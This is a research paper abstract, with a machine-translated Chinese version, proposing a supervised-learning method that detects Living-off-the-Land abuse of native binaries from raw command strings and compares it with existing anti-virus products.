Living-off-the-Land is an evasion technique used by attackers where native binaries are abused to achieve malicious intent. Since these binaries are often legitimate system files, detecting such abuse is difficult and often missed by modern anti-virus software. This paper proposes a novel abuse detection algorithm using raw command strings. First, natural language processing techniques such as regular expressions and one-hot encoding are utilized for encoding the command strings as numerical token vectors. Next, supervised learning techniques are employed to learn the malicious patterns in the token vectors and ultimately predict the command's label. Finally, the model is evaluated using statistics from the training phase and in a virtual environment to compare its effectiveness at detecting new commands to existing anti-virus products such as Windows Defender.
翻译:由于这些二进制通常是合法的系统文档,因此很难发现这种滥用情况,而且现代反病毒软件也常常忽略了这种滥用情况。本文件提出使用原始指令字符串的新式虐待检测算法。首先,使用常规表达式和一热编码等自然语言处理技术将指令字符串编码为数字代号矢量。接着,使用监督学习技术来学习象征性矢量中的恶意模式,并最终预测指令的标签。最后,利用培训阶段和虚拟环境中的统计数据来评价模型,以比较其在发现新指令与Windows Deference等现有抗病毒产品方面的效力。